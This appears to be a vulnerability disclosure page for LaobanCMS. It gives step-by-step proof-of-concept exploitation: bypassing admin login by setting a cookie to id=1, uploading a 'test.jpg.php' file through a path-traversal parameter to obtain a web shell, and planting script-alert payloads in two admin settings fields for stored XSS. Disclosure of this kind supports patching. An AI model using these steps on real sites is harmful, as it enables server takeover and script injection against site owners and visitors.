Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

File upload

In laobancms/admin/wenjian.php line 103 to 112

It simply validates the existence of '.jpg |.png |.gif |.jpeg |.html |.js |.css' in the file name by using the strstr() function.

So ,upload test.jpg.php

First,login the admin page by setting the cookie(id=1) (CVE-2018-19224)

Visit admin/wenjian.php?wj=../templets/pc, upload test.jpg.php

Vist: templets/pc/test.jpg.php

We can get shell !

XSS1

Login the admin page by setting the cookie(id=1) (CVE-2018-19224)

Visit: admin/info.php?shuyu=基础设置

Fill "><script>alert(1)</script> in the "网站SEO关键词" form

Click the '保存更改' button to save the changes

Click the '生成'->'更新今日' button in the upper right corner to update

Then visit the index

XSS2

Login the admin page by setting the cookie(id=1) (CVE-2018-19224)

Visit: admin/info.php?shuyu=我的参数

Fill <script>alert(1)</script> in the "首页简介" form

Click the '保存更改' button to save the changes

Click the '生成'->'更新今日' button in the upper right corner to update

Then visit the index